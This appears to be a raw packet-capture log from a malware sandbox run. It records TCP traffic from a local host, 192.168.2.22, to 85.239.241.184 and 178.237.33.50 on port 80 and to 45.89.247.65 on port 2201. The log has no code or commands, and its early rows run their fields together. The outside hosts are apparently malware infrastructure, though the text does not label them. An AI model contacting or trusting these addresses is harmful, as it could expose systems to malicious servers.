                          Sep 6, 2024 11:26:05.490665913 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.490677118 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.490683079 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.490688086 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.490698099 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.490708113 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.490736008 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.490905046 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.490915060 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.490930080 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.490940094 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.490945101 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.490948915 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.490959883 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.490969896 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.490993977 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.491158962 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.491168976 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.491178989 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.491197109 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.491199970 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.491208076 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.491223097 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.491233110 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.491236925 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.491242886 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.491254091 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.491261959 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.491264105 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.491274118 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.491283894 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.491296053 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.491296053 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.491307020 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.491314888 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.491343021 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.491489887 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.491499901 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.491509914 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.491527081 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.491532087 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.491539001 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.491549015 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.491560936 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.491569996 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.491597891 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.491656065 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.491666079 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.491674900 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.491686106 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.491693974 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.491697073 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.491707087 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.491717100 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.491723061 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.491728067 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.491739988 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.491750956 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.491754055 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.491791964 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.491980076 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.492034912 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.492047071 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.492055893 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.492074966 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.492197990 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.492208004 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.492223024 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.492233038 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.492238045 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.492243052 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.492252111 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.492263079 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.492265940 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.492273092 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.492275953 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.492284060 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.492292881 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.492304087 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.492306948 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.492315054 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.492326975 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.492340088 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.492340088 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.492393017 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.576374054 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.576392889 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.576404095 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.576414108 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.576425076 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.576427937 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.576436043 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.576441050 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.576451063 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.576473951 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.576513052 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.576522112 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.576530933 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.576548100 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.576555967 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.576558113 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.576567888 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.576579094 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.576581001 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.576590061 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.576598883 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.576616049 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.576616049 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.576630116 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.576639891 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.576664925 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.576689005 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.576699018 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.576709032 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.576719999 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.576725006 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.576734066 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.576745987 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.576755047 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.576756001 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.576766968 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.576772928 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.576797009 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.576970100 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.576980114 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.576988935 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.576997995 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.577009916 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.577018023 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.577020884 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.577032089 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.577042103 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.577047110 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.577053070 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.577064037 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.577073097 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.577079058 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.577096939 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.577102900 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.577112913 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.577121973 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.577140093 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.577141047 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.577151060 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.577162027 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.577182055 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.577236891 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.577246904 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.577256918 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.577271938 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.577275991 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.577285051 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.577307940 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.577392101 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.577402115 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.577410936 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.577425957 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.577431917 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.577436924 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.577456951 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.577476978 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.577488899 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.577497959 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.577508926 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.577519894 CEST804916385.239.241.184192.168.2.22
                          Sep 6, 2024 11:26:05.577519894 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.577529907 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:05.654774904 CEST4916380192.168.2.2285.239.241.184
                          Sep 6, 2024 11:26:07.842102051 CEST491642201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:07.850265980 CEST22014916445.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:07.850349903 CEST491642201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:07.860825062 CEST491642201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:07.865605116 CEST22014916445.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:08.456195116 CEST22014916445.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:08.593899965 CEST22014916445.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:08.593961954 CEST491642201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:08.597789049 CEST491642201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:08.602538109 CEST22014916445.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:08.602590084 CEST491642201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:08.607362032 CEST22014916445.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:09.217880011 CEST22014916445.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:09.219383955 CEST491642201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:09.224262953 CEST22014916445.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:09.276911020 CEST22014916445.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:09.280447960 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:09.285279036 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:09.285339117 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:09.289150953 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:09.293996096 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:09.336769104 CEST4916680192.168.2.22178.237.33.50
                          Sep 6, 2024 11:26:09.341624975 CEST8049166178.237.33.50192.168.2.22
                          Sep 6, 2024 11:26:09.341676950 CEST4916680192.168.2.22178.237.33.50
                          Sep 6, 2024 11:26:09.341891050 CEST4916680192.168.2.22178.237.33.50
                          Sep 6, 2024 11:26:09.346631050 CEST8049166178.237.33.50192.168.2.22
                          Sep 6, 2024 11:26:09.489871979 CEST491642201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:09.937393904 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:09.960402012 CEST8049166178.237.33.50192.168.2.22
                          Sep 6, 2024 11:26:09.960511923 CEST4916680192.168.2.22178.237.33.50
                          Sep 6, 2024 11:26:09.968861103 CEST491642201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:09.973694086 CEST22014916445.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.069514990 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.069561005 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.073977947 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.078820944 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.078872919 CEST491652201192.168.2.2245.89.247.65
                          Sep 6, 2024 11:26:10.083625078 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.393261909 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.393342972 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.393353939 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.393364906 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.393376112 CEST22014916545.89.247.65192.168.2.22
                          Sep 6, 2024 11:26:10.393381119 CEST491652201192.168.2.2245.89.247.65
Timestamp  Source Port  Dest Port  Source IP  Dest IP
Sep 6, 2024 11:26:10.393388033 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.393400908 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.393400908 CEST  49165  2201  192.168.2.22  45.89.247.65
Sep 6, 2024 11:26:10.393414021 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.393424988 CEST  49165  2201  192.168.2.22  45.89.247.65
Sep 6, 2024 11:26:10.393424988 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.393440008 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.393444061 CEST  49165  2201  192.168.2.22  45.89.247.65
Sep 6, 2024 11:26:10.393474102 CEST  49165  2201  192.168.2.22  45.89.247.65
Sep 6, 2024 11:26:10.393497944 CEST  49165  2201  192.168.2.22  45.89.247.65
Sep 6, 2024 11:26:10.393933058 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.394249916 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.394290924 CEST  49165  2201  192.168.2.22  45.89.247.65
Sep 6, 2024 11:26:10.398308039 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.484111071 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.484127998 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.484138012 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.484148979 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.484165907 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.484183073 CEST  49165  2201  192.168.2.22  45.89.247.65
Sep 6, 2024 11:26:10.484198093 CEST  49165  2201  192.168.2.22  45.89.247.65
Sep 6, 2024 11:26:10.484499931 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.484515905 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.484528065 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.484538078 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.484544039 CEST  49165  2201  192.168.2.22  45.89.247.65
Sep 6, 2024 11:26:10.484551907 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.484554052 CEST  49165  2201  192.168.2.22  45.89.247.65
Sep 6, 2024 11:26:10.484591961 CEST  49165  2201  192.168.2.22  45.89.247.65
Sep 6, 2024 11:26:10.485384941 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.485397100 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.485407114 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.485416889 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.485424042 CEST  49165  2201  192.168.2.22  45.89.247.65
Sep 6, 2024 11:26:10.485430002 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.485450983 CEST  49165  2201  192.168.2.22  45.89.247.65
Sep 6, 2024 11:26:10.486188889 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.486200094 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.486216068 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.486227036 CEST  49165  2201  192.168.2.22  45.89.247.65
Sep 6, 2024 11:26:10.486227989 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.486241102 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.486248016 CEST  49165  2201  192.168.2.22  45.89.247.65
Sep 6, 2024 11:26:10.486278057 CEST  49165  2201  192.168.2.22  45.89.247.65
Sep 6, 2024 11:26:10.486584902 CEST  49165  2201  192.168.2.22  45.89.247.65
Sep 6, 2024 11:26:10.489000082 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.489104033 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.489146948 CEST  49165  2201  192.168.2.22  45.89.247.65
Sep 6, 2024 11:26:10.557432890 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.557446003 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.557456017 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.557499886 CEST  49165  2201  192.168.2.22  45.89.247.65
Sep 6, 2024 11:26:10.575119019 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.575130939 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.575139999 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.575149059 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.575161934 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.575176954 CEST  49165  2201  192.168.2.22  45.89.247.65
Sep 6, 2024 11:26:10.575191021 CEST  49165  2201  192.168.2.22  45.89.247.65
Sep 6, 2024 11:26:10.575397015 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.575407028 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.575417042 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.575437069 CEST  49165  2201  192.168.2.22  45.89.247.65
Sep 6, 2024 11:26:10.575575113 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.575586081 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.575609922 CEST  49165  2201  192.168.2.22  45.89.247.65
Sep 6, 2024 11:26:10.575753927 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.575764894 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.575789928 CEST  49165  2201  192.168.2.22  45.89.247.65
Sep 6, 2024 11:26:10.575936079 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.575946093 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.575958967 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.575969934 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.575979948 CEST  49165  2201  192.168.2.22  45.89.247.65
Sep 6, 2024 11:26:10.576004028 CEST  49165  2201  192.168.2.22  45.89.247.65
Sep 6, 2024 11:26:10.576507092 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.576517105 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.576527119 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.576538086 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.576549053 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.576551914 CEST  49165  2201  192.168.2.22  45.89.247.65
Sep 6, 2024 11:26:10.576560020 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.576567888 CEST  49165  2201  192.168.2.22  45.89.247.65
Sep 6, 2024 11:26:10.576572895 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.576581955 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.576598883 CEST  49165  2201  192.168.2.22  45.89.247.65
Sep 6, 2024 11:26:10.576622963 CEST  49165  2201  192.168.2.22  45.89.247.65
Sep 6, 2024 11:26:10.577156067 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.577167988 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.577178001 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.577193022 CEST  49165  2201  192.168.2.22  45.89.247.65
Sep 6, 2024 11:26:10.577330112 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.577341080 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.577352047 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.577353001 CEST  49165  2201  192.168.2.22  45.89.247.65
Sep 6, 2024 11:26:10.577370882 CEST  49165  2201  192.168.2.22  45.89.247.65
Sep 6, 2024 11:26:10.579435110 CEST  49165  2201  192.168.2.22  45.89.247.65
Sep 6, 2024 11:26:10.635745049 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.635781050 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.635792017 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.635802984 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.635824919 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.635835886 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.635843992 CEST  49165  2201  192.168.2.22  45.89.247.65
Sep 6, 2024 11:26:10.635847092 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.635858059 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.635863066 CEST  49165  2201  192.168.2.22  45.89.247.65
Sep 6, 2024 11:26:10.635883093 CEST  49165  2201  192.168.2.22  45.89.247.65
Sep 6, 2024 11:26:10.635895967 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.635907888 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.635931015 CEST  49165  2201  192.168.2.22  45.89.247.65
Sep 6, 2024 11:26:10.647977114 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.647990942 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.648006916 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.648019075 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.648029089 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.648027897 CEST  49165  2201  192.168.2.22  45.89.247.65
Sep 6, 2024 11:26:10.648067951 CEST  49165  2201  192.168.2.22  45.89.247.65
Sep 6, 2024 11:26:10.648077011 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.665867090 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.665896893 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.665939093 CEST  49165  2201  192.168.2.22  45.89.247.65
Sep 6, 2024 11:26:10.665951014 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.665961027 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.665987968 CEST  49165  2201  192.168.2.22  45.89.247.65
Sep 6, 2024 11:26:10.666014910 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.666029930 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.666039944 CEST  2201  49165  45.89.247.65  192.168.2.22
Sep 6, 2024 11:26:10.666050911 CEST  2201  49165  45.89.247.65  192.168.2.22
